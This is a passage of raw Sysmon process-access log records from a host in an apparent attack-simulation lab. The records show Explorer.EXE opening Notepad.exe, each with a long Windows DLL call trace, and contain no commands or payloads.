4393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203440Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002203439Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203438Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203437Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203436Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002203435Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203434Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203433Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203432Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002203431Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203430Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203429Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203428Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002203427Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203426Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203425Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b